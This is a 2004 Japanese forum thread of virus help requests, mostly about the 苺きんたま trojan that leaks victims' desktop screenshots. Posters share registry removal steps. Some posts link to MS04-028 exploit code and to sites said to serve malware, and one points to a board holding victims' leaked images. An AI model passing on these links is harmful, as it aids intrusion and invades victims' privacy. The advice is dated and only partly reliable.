563 :名無しさん@お腹いっぱい。:04/09/24 21:14:06
ユーザー名の完全な変更の仕方教えてください
WINXPです

564 :名無しさん@お腹いっぱい。:04/09/24 21:18:17
>>563
再インストール

565 :名無しさん@お腹いっぱい。:04/09/24 21:19:25
画面に全体に急に血飛沫が出てきたんですけど、これってウイルス?

566 :名無しさん@お腹いっぱい。:04/09/24 21:22:19
>>565
ジョークソフトで似たようなのがあったな
スタートアップとかに変なexeないか?

567 :名無しさん@お腹いっぱい。:04/09/24 21:27:12
>>566
確かにジョークソフトでもあるんだが、キンタマの症状でもあるんだよなぁ・・・。
「致死武器」

>>563
「XP ユーザー名 変更」でググれ。苺?

568 :名無しさん@お腹いっぱい。:04/09/24 22:05:53
>>482
俺も最新アップデート後、全検索したらSVKP.sysにBKDR_SURILA.Bが検出された。
しかし、不自然なのは検出ファイルがSVKP.sysしかないことだ。
SVKP.sysをコピーする他のウイルスの解説を読んでも、SVKP.sys自体はAntiCrackingが
提供するSVK Protectorの正規コンポーネントで、害の無いプログラムも利用しているとあり
ファイルサイズも同じだった。
また居昇殿起動時にリアルタイム検索に反応すること、SVKP.sysの更新日時は居昇殿を
インストールしたときと重なることから、居昇殿がソフトウェア保護のためにSVKPサービス
を利用しているだけで、今回は誤検出であると俺は予想というか期待している。
一応TrendMicroにウイルス検体としてSVKP.sysを送り返事を待っているところだ。
1営業日経過したが返事はこない。返事は来週になりそうだ。

569 :名無しさん@お腹いっぱい。:04/09/24 22:10:39
>>541
直したいなら始めからそう言えばいいのに。
2kの場合「システム修復プロセス」でレジストリの修復ができるらしい。
詳しい方法は、ググればわかるよ。

570 :568:04/09/24 22:31:07
ttp://www.gamania.co.jp/kd/news/news_mainte_detail.asp?newsid=624
居昇殿の公式サイトに載ってた。やはり無問題っぽい。
今のところSVKP.sysの隔離を解除し、リアルタイム検索でSVKP.sysを検索対象外に登録
することで問題なく動作している。


571 :名無しさん@お腹いっぱい。:04/09/24 23:59:41
正しくは巨商伝か。どーりでみつからん訳だ。

572 :名無しさん@お腹いっぱい。:04/09/25 00:15:27
自分は巨匠伝も、TWもまったく触れてないのにSURILA.Bに感染してました・・・
なにをしているトロイなのか分からずとても不安なので、解説出るまで回線つなげない事にします。
来週には駆除できるといいなぁ

573 :名無しさん@お腹いっぱい。:04/09/25 00:36:18
shellsystem.exe発見したんですが削除できません
教えてくれませんか?

574 :名無しさん@お腹いっぱい。:04/09/25 00:38:08
>>573
[対処法]
(1)マイコンピュータを開き、Cドライブ→WINDOWSフォルダを開く
(2)検索ボタンを押してファイルとフォルダすべてからshellsystem.exeを検索
(3)検索結果に引っかかったならば削除

(4)スタートメニューの[ファイル名を指定して実行]を選びregeditと入力
(5)HKEY_USERS → .Default → Software → Microsoft
  → Windows → CurrentVersion → Run
  と選んでいく
(6)shellsystem.exe :='C:\Windows\shellsystem.exe'というキーを削除

(7)HKEY_CURRENT_USER → Software → Microsoft
  → Windows → CurrentVersion → Run
  と選んでいく
(8)shellsystem.exe :='C:\Windows\shellsystem.exe'というキーを削除

[情報]
追加されるファイル:
windows\shellsystem.exe 678kB

追加されるレジストリ:
HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Run
shellsystem.exe :='C:\Windows\shellsystem.exe'

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
shellsystem.exe :='C:\Windows\shellsystem.exe'


575 :名無しさん@お腹いっぱい。:04/09/25 00:40:29
>>574をセーフモードで行う。


576 :名無しさん@お腹いっぱい。:04/09/25 00:47:40
すいません
セーフモードってどうやってやるんですか?
全然わからないのです

577 :名無しさん@お腹いっぱい。:04/09/25 00:49:13
>>576
OSは?

578 :名無しさん@お腹いっぱい。:04/09/25 00:52:07
XPです


579 :名無しさん@お腹いっぱい。:04/09/25 00:53:14
>>578
PC再起動時にF8連打

580 :名無しさん@お腹いっぱい。:04/09/25 00:55:13
わかりました
やってみます
再起動のときずっと連打してればいいんですか?

581 :名無しさん@お腹いっぱい。:04/09/25 00:57:48
>>580
そうそう。

582 :名無しさん@お腹いっぱい。:04/09/25 00:58:52
ありがとうございました
もしできなければよろしくお願いします;

583 :名無しさん@お腹いっぱい。:04/09/25 01:19:50
ほんっとごめんなさいなんですけど
(6)shellsystem.exe :='C:\Windows\shellsystem.exe'というキーを削除
はrunの中にあるのでしょうか
それがないんですけど・・・

584 :名無しさん@お腹いっぱい。:04/09/25 01:41:43
>>581
おかげさまで消せる事ができました!
ありがとうございました!

585 :名無しさん@お腹いっぱい。:04/09/25 01:47:40
>>584
あぁ、Runにあったんだ。まずは良かった。

586 :名無しさん@お腹いっぱい。:04/09/25 01:54:35
とりあえずID出ない板では名前に番号でも入れて誰だか区別できるようにしようね

587 :名無しさん@お腹いっぱい。:04/09/25 01:58:06
苺の元種ってどっかで手に入らないかなぁ

588 :名無しさん@お腹いっぱい。:04/09/25 03:26:04
>>574さん
(5)のやり方で、「Run」の中に「ctfmon.exe(REG_SZ)」がありました。
これは削除すべきですか?

(7)の「Windows」の中に「Shell」と「ShellNoroam」があるのですが、
これはshellsystemと関連があるのでしょうか?削除すべきですか?

また、(7)の「current version」の中に「Shell Extensions」があるのですが、
これもshellsystemと関連があるのでしょうか?削除すべきですか?


ちなみに、(5)(7)の「Run」の中には「shellsystem.exe」のファイルはありません。
タスクマネージャーの中でそのファイルが機能していないので、
問題はないかと思いますが、少し不安です。

589 :名無しさん@お腹いっぱい。:04/09/25 03:30:56
>>588ですが、ちょい訂正。

shellsystem.exeを削除したので、
タスクマネージャーの中にはなく、処理速度は通常に戻っています。
なので、問題はないかと思いますが、少し不安です。

ちなみに、「HijackThis」で「shellsystem」の部分は削除しました。



590 :名無しさん@お腹いっぱい。:04/09/25 03:51:34
質問しまくりだな
少しは自分で調べようとする気はないのか?
てゆうか、おまい誰よ?

591 :名無しさん@お腹いっぱい。:04/09/25 04:00:47
>>589
今クグってきました。どうやらどれも問題ないようです。
すんません、勝ってに騒いで迷惑かけて。

592 :やちゃた:04/09/25 06:35:37
みなさん、ご迷惑おかけしました。541のBKDR_SURILA.Bの件のものです。
私の結論は判明しました。
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_SURILA.B&VSect=T
まったくの一人芝居みたいになり、皆を巻き込み恥ずかしい限りです。
>>549
ほんと、希少な情報を色々調べてもらいありがとうございました。
>>568 >>570
その通りでした。
>>569
欲張ってあれこれ聞いては、皆の迷惑と思って^^;;しかし、今にな
ってはシステムの回復が最大ネックです。がんばります。
>>572
いきさつは、私程度にはわかりませんが、がんばってください。

ということで、とあるゲームのプログラム中に不正でなく使われただけ
で、私が勘違いしてレジストリいじりまくったのがまずかっただけにな
りました。現在、M社オフィスのインストローラーが働かない、メールが
送信できない、起動が少し遅いが(一応ウイルスはないようです)が
課題になりました。これはスレ違いなので、ここでのアドヴァイスは
遠慮しますね。(ヒントもいただきました)皆さん本当にありがとうござ
いました。

593 :名無しさん@お腹いっぱい。:04/09/25 08:06:35
LiveUpdateでUpchan来てる?
そろそろ来ないと被害者数が凄いことになりそうなんだが

594 :名無しさん@お腹いっぱい。:04/09/25 10:15:02
>>593
LiveUpdateでの対応は9月29日(水)予定らしい。
すぐに対応したい場合は下のサイトからなら初期のUpchanのみ対応できる。
亜種のcontig.txt.......exeなどは対応してないようだ。

Security Response
http://www.symantec.com/region/jp/sarcj/download/jp/JP-N95.html

595 :名無しさん@お腹いっぱい。:04/09/25 16:49:21
>>589
HijackThisで消してるじゃん

596 :名無しさん@お腹いっぱい。:04/09/25 18:25:46
すいませんSURILA.B関連の話なのですが、、、

このスレッドを読んで、SURILAを駆除しようとpandaのオンラインスキャンをしたんです。
それから>>505>>513を読んで驚いてしましました。
この話は本当で、だとしたらpandaからもらったウイルスはどう駆除できるのでしょうか?
トレンドマイクロオンラインスキャンをしてみたら検出はされなかったのですが。

597 :名無しさん@お腹いっぱい。:04/09/25 23:07:01
ちょっと質問よいだろうか紳士諸兄。
最近巷で噂の苺きんたま。

気になったので一応自分のPCも調べてみて
全ファイル検索とタスクマネージャでは
sugoimonoss.comもshellsystem.exeもみつからなかったのだが
レジストリエディエタを検索してみたら
search Assistantというところに
種類 REG_SZ データ shellsystem.exeというのが出てきたので…
これは一体…?


あと、念のためこのトロイが潜むのはc:\windows直下ということで間違ってない?

598 :名無しさん@お腹いっぱい。:04/09/25 23:24:23
>>597
OS再インストすれば、消えるよ(*^ー゚)b

599 :名無しさん@お腹いっぱい。:04/09/25 23:31:20
500 名前:名無しさん@お腹いっぱい。[sage] 投稿日:04/09/25(土) 21:41:05 ID:HKA4Ue+e
C:\WINDOWS\〜でファイルの参照したら

$NtUninstallKB821557$
$NtUninstallQ810565$
$NtUninstallKB839643-DirectX9$

こんなのが青字でいっぱい出てきたんだけど何?
(((( ;゚Д゚)))ガクガクブルブル

つー質問があって、レスにそれウイルスの残すファイルだ〜ってあったんだが
本当?
$NtUninstallKB839643-DirectX9$があってさ、でもこれDirectX9入れたせいだと思うんだが・・
それにWindows Update 後にできるフォルダじゃなかったっけ?

もしかして俺釣られた?

600 :名無しさん@お腹いっぱい。:04/09/25 23:38:27
>>597
それ、検索したときの履歴がレジストリに残ってるだけだろ。
c:\windows直下で間違いない・・・はず。

>>599
ん?

コンピュータウィルス総合スレッド VOL.41
http://pc6.2ch.net/test/read.cgi/pcqa/1095335861/263

で質問したのとは別人?

601 :名無しさん@お腹いっぱい。:04/09/25 23:42:28
>600
うん
500の質問に自信満々にレスしてたから
500に大丈夫と言っていいのか
俺の記憶違い(Windows Update 後にできるフォルダ)だったのか不安になっちゃってさ

で、質問板で聞けって500の人も言われてたから、一応「質問」で出たすれを検索してみたけど
聞いてないみたいだったんで被ってないと思って聞いてみた次第です
マルチみたいになって申し訳ないっす


602 :名無しさん@お腹いっぱい。:04/09/26 08:11:41
再インストって再セットアップとは違う?

603 :名無しさん@お腹いっぱい。:04/09/26 08:15:18
>>602
同じです

604 :名無しさん@お腹いっぱい。:04/09/26 11:43:59
俺も質問!  PC立ち上げてネットにつなぐと
「表示出来ない・・・」 つーのが延々と出てくる・・・・
なんだこりゃ??


605 :名無しさん@お腹いっぱい。:04/09/26 12:44:28
ttp://homepage1.nifty.com/airmail/news_diary.htm

9/22のところ

606 :名無しさん@お腹いっぱい。:04/09/26 13:48:28
「マイドキュメント」が
「マイドキュソメント」に
いつの間にか書き換えられてました・・・

そんなウイルスってございます?

607 :名無しさん@お腹いっぱい。:04/09/26 13:54:44
>>606
考えられるのは、ぬるぽだとか2chねらーのウィルスだな
どうせWinnyやってたか、アプロダから変なもんDLしたんだろ
ご愁傷様、バカな自分を恨んでください

608 :名無しさん@お腹いっぱい。:04/09/26 14:23:18
掲示板に故意にウイルスへのリンクを貼り付けたら犯罪になりませんか?

609 :名無しさん@お腹いっぱい。:04/09/26 14:34:44
ウィルス:BKDR_SURILAB
感染ファイル:C\WINDOWS\system32\SVKP.sys

と、トレンドマイクロのオンラインスキャンがおっしゃってるのですが
データベースにありません…感染ファイル消そうかと思ったけど、なんかヤバげなファイルだし、どうしましょう


610 :名無しさん@お腹いっぱい。:04/09/26 14:40:08
>>609
お前がスペルミスしてるだけ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_SURILA.B

611 :名無しさん@お腹いっぱい。:04/09/26 14:51:09
ウイルスに感染したらタスクに表示されますよね?


612 :名無しさん@お腹いっぱい。:04/09/26 15:00:21
ノートンでチェックしたら4つほど修復できないファイルが見つかり
検疫はできたのですが、この検疫ってのをした状態で放っておいて大丈夫ですか?

ウイルス名は
・BloodhoundExploit.6 (←×2)
・Trojanhorse (←×2)

613 :名無しさん@お腹いっぱい。:04/09/26 15:07:45
>>611
タスクに表示されないものもあるよ

>>612
シマンテックのウィルスデータベース見て、手動駆除しなさい

614 :名無しさん@お腹いっぱい。:04/09/26 15:19:34
苺きんたまウィルスにかかったようです
まとめサイトを参考にファイルを削除したのですが
削除したとたんフリーズしてしまいます
再起動するとパソコンのデータが消えてしまいます
どのアイコンをクリックしても動きません
再起動、終了を10回ほど繰り返すと元に戻ります
で、検索すると削除したはずのshellsystem.exeがまたあります
どうすればいいですか?

615 :名無しさん@お腹いっぱい。:04/09/26 15:22:53
>>614
やましいファイルを落としたあなたがバカなだけです
ネット接続を切断して、セーフモードで除去してみろ
どうせレジストリも残ってるんだろうから、ちゃんと見て駆除しなさい

616 :名無しさん@お腹いっぱい。:04/09/26 15:23:19
>>614
フォーマット
どうせ知識不足だろ

617 :名無しさん@お腹いっぱい。:04/09/26 15:24:36
>>615
難しすぎて何をいってるのかわかりません

618 :あぼーん:あぼーん
あぼーん

619 :名無しさん@お腹いっぱい。:04/09/26 16:05:12
>>617
わからないなら再インストールしろ

620 :名無しさん@お腹いっぱい。:04/09/26 16:10:44
>617
つーかさ615に書いてるのって初心者向け雑誌にすら書いてる様な事だぞ
ネット接続を切断、セーフモード、レジストリ
きつい様だがこれぐらいは最低限必要な知識と思う

セーフモードの入り方は買ったPCの説明書にも書いてるだろうからそれ参考に
再インストールするなら説明書みるなり、ネットで検索かけるなりで

621 :名無しさん@お腹いっぱい。:04/09/26 16:13:39
すいません、質問させてください。
症状ですが、家に帰ってきてパソコンを立ち上げたら画面が青くなってました。
一応ノートンとアドウェアでチェックしスパイウェアは削除したのですが・・・
直らないので改善方法を教えていただけると助かります。

622 :名無しさん@お腹いっぱい。:04/09/26 16:16:50
>>621
「青くなってました」じゃ、ブルースクリーンなのかスパイウェアなのかもわからない
それじゃ回答しようがない

623 :名無しさん@お腹いっぱい。:04/09/26 16:17:08
>>621
トマトが赤くなると医者が青くなると昔からいわれています。

624 :621:04/09/26 16:20:00
う、すいません。
えっと、全体的に青みがかっている感じです。
文字を見たり書いたりすることは可能な状態です。

625 :名無しさん@お腹いっぱい。:04/09/26 16:21:15
ん? モニターがいかれたって可能性は?

626 :621:04/09/26 16:26:00
モニター自体のメニューを開くと普通に表示されるので、モニターは正常だと思うのですが・・・

627 :名無しさん@お腹いっぱい。:04/09/26 16:30:06
>>626
ブラウン管?
画面が焼きついたとかw
液晶ならありえないけど


628 :名無しさん@お腹いっぱい。:04/09/26 16:31:15
>>621
おまいもまずここ行ってこい
ttp://myu.daa.jp/osiete/index.html

629 :名無しさん@お腹いっぱい。:04/09/26 16:36:23
>>623
リンゴじゃなかったか?

630 :名無しさん@お腹いっぱい。:04/09/26 16:42:44
>>617
F8キーを押しながら起動

631 :621:04/09/26 16:51:41
えっと、解決しました。
原因はディスプレイにあったみたいで、
物置においてあったディスプレイにつないだらくっきり・・・・
こんなへたれの質問に答えて頂きありがとうございました。

632 :85:04/09/26 16:53:14
質問者は>>85or>>86の質問テンプレ使うと
回答者もわかりやすく、回答もつきやすい・・・かも。

では、次の方ドゾー↓

633 :名無しさん@お腹いっぱい。:04/09/26 16:54:36
>>629
トマトです、ヨーロッパのことわざ

634 :名無しさん@お腹いっぱい。:04/09/26 17:15:30
an apple a day keeps doctor away

635 :名無しさん@お腹いっぱい。:04/09/26 17:19:44
>>614です
セーフモードで削除してみましたが
再起動したらまた復活してました
どうすればいいですか?
>>574の方法も全部しましたけど再起動したら復活してました
どうすればいいですか?

636 :名無しさん@お腹いっぱい。:04/09/26 17:24:29
>>635
もしかして、OH〜〜〜YES!!は Me ですか?


637 :名無しさん@お腹いっぱい。:04/09/26 17:31:27
>>635
システムの復元を無効にしてみた?

638 :名無しさん@お腹いっぱい。:04/09/26 17:53:36
>>635
あんたじゃ無理 悲しいけど、フォーマットする

639 :名無しさん@お腹いっぱい。:04/09/26 19:34:07
http://213.159.117.134/index.php
ってサイトにつながって、ホームページかえられなくなりました。
どうすればいいんですか。。。。?

640 :('A`)マンドクセ:04/09/26 19:53:10
>>639
エロサイト見たら…助けて下さい!Part41
http://pc6.2ch.net/test/read.cgi/pcqa/1095834281/

テンプレ実行せずに質問するとボコボコにされるから、ちゃんとテンプレ読めよ


641 :Bloodhound.Exploit.13:04/09/26 21:49:12
Bloodhound.Exploit.13

ファイルを分析しました。
送られたそれぞれのファイルについてわかったことを以下に報告します。
ファイル名: CRASH-TEST.RenameToJPG
結果: デベロッパーノートを参照してください。
ファイル名: poc_poc.jpg
結果: デベロッパーノートを参照してください。
デベロッパーノート
:
CRASH-TEST.RenameToJPG This is a proof-of-concept program that does not contain
any malicious payload. You can delete it safely.
Poc_poc.jpg This is a proof-of-concept program that does not contain any malicious payload.
You can delete it safely.
このファイルにウィルスがいると判断しましたが、特に問題はありません。
詳しくはデベロッパーノートをご覧ください。

(C)2004 シマンテック・セキュリティ・レスポンス
(P)2004 シマンテック・セキュリティ・レスポンス

642 :Bloodhound.Exploit.13:04/09/26 21:49:35
セキュリティホール memo
http://www.st.ryukoku.ac.jp/~kjm/security/memo/


http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2004/09.html#20040916_MS04-028
発見者による解説
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/full-disclosure/2004.09/msg00515.html
crash する exploit
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2004.09/msg00206.html
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/full-disclosure/2004.09/msg00523.html
コマンドを実行するexploit が登場
http://www.k-otik.com/exploits/09222004.ms04-28.sh.php
http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php
http://www.k-otik.com/exploits/09232004.ms04-28-admin.sh.php
http://d.hatena.ne.jp/hideakii/20040924#1096004636

643 :名無しさん@お腹いっぱい。:04/09/26 21:57:51
すみません、ルータに感染するウイルスはあるのでしょうか?

また、一つのルータで、一本のLANケーブルを二つのパソコンに交互に
繋いだ時、片方のパソコンがウイルスに感染していた場合、それに
さしていたLANケーブルをぬき、別のパソコンに繋いだ時、
そのパソコンも感染してしまうのでしょうか?

どうかよろしくお願いします。


644 :名無しさん@お腹いっぱい。:04/09/26 22:09:08
質問です。

3年前に買ったVAIOなんですが前に入れておいたウィルス対策ソフトの
期限が切れたので早速買ってきた対策ソフト(SOURCENEXTウィルスセキュリティ2005)
を入れてみたんですが、ソフトの指示に従い再起動後、CDドライブが認識されなくなってしまい、
インターネットにも接続できない状態です。しかも入れたはずの対策ソフトが見当たりません。
今はサブPCから書き込みしています。何かアドバイスを頂けないでしょうか・・・

645 :名無しさん@お腹いっぱい。:04/09/26 22:16:46
>>644
コッチの方がいいかも・・・

【ソースネクスト】ウイルスセキュリティ2005 Part9【K7】
http://pc5.2ch.net/test/read.cgi/sec/1095983778/l50

スレの雰囲気は、読んでないからしらん。

646 :名無しさん@お腹いっぱい。:04/09/26 22:23:56
>>644
うは、ご愁傷様でした
そっちのスレ見ればわかるけど、不具合満載ソフトだよ
フリーソフトの方がまだマシだという糞フト
授業料だと思って諦めるといいと思うよ

647 :645:04/09/26 22:39:05
>>646
人を誘導しといて言うのもなんだが、テンプレ段階でワロテしもた。
なんか、今後目が離せないスレになったよw

648 :迷惑だった:04/09/26 22:39:49
此処も
ウィルス 落としています

逮捕してください
homepage3.nifty.com/shiofuki/

649 :名無しさん@お腹いっぱい。:04/09/26 22:48:30
>>648
逮捕はK察のお仕事。迷惑したならniftyに文句を言ってくらはい。

650 :名無しさん@お腹いっぱい。:04/09/26 22:57:26
>>645>>646
レスthxです。

ウィルスセキュリティ2005を入れる前にもPCがいきなり再起動したりすることがあったのでウィルスの可能性もあるかと思いここに書き込んでみたんですが・・・
ちなみに今はセーフモードでしか動かせないです。
こんな症状のウィルスって無いんですかね・・・

651 :名無しさん@お腹いっぱい。:04/09/26 23:33:02
苺きんたまの事で、お願いします
よくわからない物がレジストリに表示されるんです。
感染しているかどうか不明だったので、Cドライブにshellsystem.exeがないか
検索しましたが、ありませんでした。それからregeditを開いて
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
を見ましたが、こちらにもありませんでした。ですが、
regeditで更にshellsystemを検索したところ、
shellsystemとshellsystem.exeがありました。
001"shellsystem"みたいな感じで…(この番号ははっきり覚えてません)。
セーフモードで起動してregeditでshellsystemを検索すると
やはり 000"shellsystem"と出ます。
下のステータスバーのところには、
マイコンピュータ\HKEY_USERS\.DEFAULT\Software\Microsoft\InternetExplorer\
Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\FilesNamedMRU
とあります。普通に起動していた時も、検索結果でExplorer Bars…というのが見えました。
このregeditでの検索結果のshellsystemとshellsystem.exeが
何度削除しても復活しているんです。
該当ファイルはなかったんですが、やっぱり感染してたんでしょうか。
それと、どうすれば消えるんでしょうか…
長くてすみません。

652 :名無しさん@お腹いっぱい。:04/09/26 23:53:33
>>651
>このregeditでの検索結果のshellsystemとshellsystem.exeが
>何度削除しても復活しているんです。

レジストリの値を消したって意味?

653 :651:04/09/26 23:58:56
000にshellsystem、001にshellsystem.exeとあったので
000と001を右クリックして、そのまま削除を選んだのですが…

今再起動してみたら、この二つは消えていました。
というより、000と001が消えていました。
これってもしかしてまずいんでしょうか?

654 :名無しさん@お腹いっぱい。:04/09/27 00:01:45
ttp://www.cty-net.ne.jp/~taitiro/imgboard/data/img20040825044524.jpg
一応ウィルス付きみたいだけど、Norton 付きでこれ踏んだ後スキャンしたら
Documents and Settings\*****i\Application Data\Sun\Java\Deployment\cache\javapi\v1.0\jar\
にTrojan.ByteVerifyが検出された。Nortonで 削除されたなら大丈夫かな?

655 :名無しさん@お腹いっぱい。:04/09/27 00:06:20
>>654
ば〜〜〜〜〜〜〜か
URL貼ってんじゃネ〜ヨ


656 :652:04/09/27 00:25:40
>>653
よいよい。それで、おっけー。

>>654
直リンじゃないから、いいんでないか?と思いつつ、
トロイの方はノートン先生で大丈夫と思うが、そういう
とこいってるとなると、スパイウエアあたりにやられて
そうな希ガス。
エロサイト見たら…助けて下さい!Part41
http://pc6.2ch.net/test/read.cgi/pcqa/1095834281/l50
テンプレ4のAd-awareSEとSpybotS&Dで再チェックを
お勧めしマフ。

657 :名無しさん@お腹いっぱい。:04/09/27 00:31:49
virus bulletinみたいな評価サイトで
最近の評価が載ってるサイトありませんか

658 :651:04/09/27 00:32:19
>652
ありがとう。安心して眠れそうです。

レスを頂くまで自力で調べてみてました。
〜Explorer Barsにあったshellsystemは、自分のOSの中身を検索したから
それが出てきた…という事なのでしょうか。感染もしていなかったみたいで、ほっとしました。

659 :654:04/09/27 00:38:41
>>655
スマンかった。

>>656
いや、普段こういうとこは見てない。直リンではまった。(バカ
でもAd-awareでスキャンしといた。サンクス。


660 :名無しさん@お腹いっぱい。:04/09/27 00:39:34
>>658
http://www.geocities.jp/ichigo_kintama/

こっちのほうが早い
亜種注意

661 :658:04/09/27 00:44:18
つか、>>651をよく見ればただの検索履歴ではないか

662 :失意のぼる:04/09/27 00:44:52
>>654
このへん4どけ
ttp://java.com/en/download/help/cache_virus.jsp

663 :660:04/09/27 00:45:24
間違えた。>>660>>661

664 :名無しさん@お腹いっぱい。:04/09/27 00:59:20
一度検出されたウィルス(トロイ)が検出されなくなったら
駆除されたと考えていいんですかね?
今日トロイ付きのリンクを踏んでしまいました。
そのあとシマンテックのオンラインスキャンを実行した結果トロイが検出されました。
その後自分のパソコンにインストールされているノートン(定義は半年前に期限切れ)で
スキャンし、感染:1、駆除済み:1と出ました。
その後もう一度シマンテックでオンラインスキャンしたんですが何も検出されませんでした。
念のためウィルスバスターも試しましたが何も検出されませんでした。
これは大丈夫なのでしょうか?お願いします。

665 :名無しさん@お腹いっぱい。:04/09/27 01:03:03
教えてください。
見事に苺きんたまにかかってしまったのですが、winnyをもっていなければ
デスクトップ画像がアップされないのでしょうか?

666 :名無しさん@お腹いっぱい。:04/09/27 01:06:12
>>665
大丈夫(^Д^)

667 :665:04/09/27 01:08:49
>>666
ありがとうございます。
やたらと、shellsystem error というのが出てくるので
何かと思って検索したら苺きんたまでした。
このエラーが、つまり、winnyをもってないために
アップできなかったというエラーだったんでしょうか?

668 :名無しさん@お腹いっぱい。:04/09/27 01:08:59
>>665
コレに関しては、nyは全然関係ないで〜す。
トロイ自体がうp&スレ爆撃しまーす。

>>666
こらこら、この悪魔w

>>664
シマンテック&トレンドマイクロ以上の知識と技術を
持ってる個人はそうそういませんよ〜。

669 :665:04/09/27 01:13:43
>>668

なにー!じゃあ、既にアップされたかもしれないのか・・・。
どこかで確認とかは出来ないんですよね?

670 :654:04/09/27 01:27:28
>>662
サンクス。最初は Java SDK を誤認したのかとオモタ。

671 :668:04/09/27 01:35:15
>>669
うp先は以下のとおりで〜す。

画像の一覧はこちら。重いけどリロード禁止!!5分くらいまてば表示される。
5分まっても表示されないやつは他の人の接続の邪魔になるからあきらめろ。
http://up.isp.2ch.net/upload/c=03okari/index.cgi

祭はこのあたりで〜す。(実況も同じ板でやってまーす)
【マターリ】苺きんたま監視所のまとめ&雑談ぱーと2
http://sakura02.bbspink.com/test/read.cgi/erolive/1096190772/l50


672 :665:04/09/27 01:36:45
だめだ。うぷされてた。
本気で死にたい。

673 :名無しさん@お腹いっぱい。:04/09/27 01:41:04
>>672
いきろw

674 :名無しさん@お腹いっぱい。:04/09/27 01:41:10
|・_・)....

675 :名無しさん@お腹いっぱい。:04/09/27 01:41:18
>>672
(・∀・)コンニチハ!!

676 :名無しさん@お腹いっぱい。:04/09/27 01:41:27
>>672
ィ`

677 :名無しさん@お腹いっぱい。:04/09/27 01:41:29

まとめサイト
  ttp://www.geocities.jp/ichigo_kintama/
 苺きんたま監視所パート72
http://sakura02.bbspink.com/test/read.cgi/erolive/1096215700/
ここもね

678 :名無しさん@お腹いっぱい。:04/09/27 01:41:33
>>672
ふぁいと、だよっ(つД`)

679 :名無しさん@お腹いっぱい。:04/09/27 01:41:35
記念

680 :名無しさん@お腹いっぱい。:04/09/27 01:41:51
>>672
ガンバレ!!

681 :名無しさん@お腹いっぱい。:04/09/27 01:41:57
>>672
記念に名前をどうぞ

682 :名無しさん@お腹いっぱい。:04/09/27 01:42:12
>>672
哀れwwwwwwwwwwwww

683 :名無しさん@お腹いっぱい。:04/09/27 01:42:17
寿司より早く

684 :名無しさん@お腹いっぱい。:04/09/27 01:42:17
>>672
寿司でも食え

685 :名無しさん@お腹いっぱい。:04/09/27 01:42:21
>>672
次はいいことあるさ

686 :名無しさん@お腹いっぱい。:04/09/27 01:42:24
>>665
どれどれ???おせーてー、ついでに

      ,-――――――-.
      /           |
     /           |
     /             |
    l"ジェンキン寿司   l
   ,、_lー-―――――‐--、/l
   i ト、ミミ ,r‐- 、``'ニ=‐、.彡リ.
   ヾ,iハ゛.´ _,,、_  i.; _,. ` 彡'i)
    `、j,'  `゚''´:.ノ i::<・ゝ) .ハン       へいらっしゃい!!
     i,   ` ,、/ i_ `` ,r'
   ,r〃'i  ,r'ヽ、 _,〉  /.
   /i:ト、;;i,  ミ=_‐_-, 'i /ヽ__
r-‐'´i::::ハ;;ヾ、‐‐-、  ノ´/i:::'i`i‐- 、_
::i' .l:i 'i::::i ヾ;;`‐---‐'i':/ i、 'i::! i::::i `
:i' i:| !:::l _,r.、;;;;;,r''´ヽi. ll::i i::i l:::'i


687 :名無しさん@お腹いっぱい。:04/09/27 01:42:32
ノートンはLiveUpdateしても29日までだえめですのでご注意を
今のところ自動で対応できてるアンチウイルスソフトはありません

688 :名無しさん@お腹いっぱい。:04/09/27 01:42:33
>>672
      ,-――――――-.
      /           |
     /           |
     /             |
    l"ジェンキン 寿司   l
   ,、_lー-―――――‐--、/l
   i ト、ミミ ,r‐- 、``'ニ=‐、.彡リ.
   ヾ,iハ゛.´ _,,、_  i.; _,. ` 彡'i)
    `、j,'  `゚''´:.ノ i::<・ゝ) .ハン       へいらっしゃい!!
     i,   ` ,、/ i_ `` ,r'
   ,r〃'i  ,r'ヽ、 _,〉  /.
   /i:ト、;;i,  ミ=_‐_-, 'i /ヽ__
r-‐'´i::::ハ;;ヾ、‐‐-、  ノ´/i:::'i`i‐- 、_
::i' .l:i 'i::::i ヾ;;`‐---‐'i':/ i、 'i::! i::::i `
:i' i:| !:::l _,r.、;;;;;,r''´ヽi. ll::i i::i l:::'i

689 :名無しさん@お腹いっぱい。:04/09/27 01:42:37
>>672
どんまいでーす(^o^)/

690 :名無しさん@お腹いっぱい。:04/09/27 01:42:37
寿司の出前がきますよ、

691 :名無しさん@お腹いっぱい。:04/09/27 01:42:53
ジェンキン寿司
ここ違うw

692 :名無しさん@お腹いっぱい。:04/09/27 01:43:00
イイ事あるさw

693 :名無しさん@お腹いっぱい。:04/09/27 01:43:02
\     、 m'''',ヾミ、、 /   
  \、_,r Y  Y ' 、 /';,''    
  、 ,\ヽ, | | y /、 ,;;,,'',  
   \、\::::::::::/, /,, ;;,    
   ヽ\ o 、 ,o / { ;;;;;;;,,       
   丿 [ \|:::|/ ]  >"'''''   <ガリ
   >、.>  U   <,.<           
  ノ  ! ! -=- ノ!  ト-、       
..''"L  \\.".//_ |   ゙` ]



694 :名無しさん@お腹いっぱい。:04/09/27 01:43:09
>>672
がんばれよ

695 :名無しさん@お腹いっぱい。:04/09/27 01:43:14
>>672
ちゃんと駆除しとかないとずっと晒されてるぞ。
対処しとけ。

696 :名無しさん@お腹いっぱい。:04/09/27 01:43:23
記念カキコ

697 :名無しさん@お腹いっぱい。:04/09/27 01:43:25
おまえらw

698 :名無しさん@お腹いっぱい。:04/09/27 01:43:25
出前乙
あと>>672 がんがれ

699 :名無しさん@お腹いっぱい。:04/09/27 01:43:45
>>672
自分で対処出来ないようならしばらくネットするな

700 :名無しさん@お腹いっぱい。:04/09/27 01:43:47
\     、 m'''',ヾミ、、 /   
  \、_,r Y  Y ' 、 /';,''    
  、 ,\ヽ, | | y /、 ,;;,,'',  
   \、\::::::::::/, /,, ;;,    
   ヽ\ o 、 ,o / { ;;;;;;;,,    
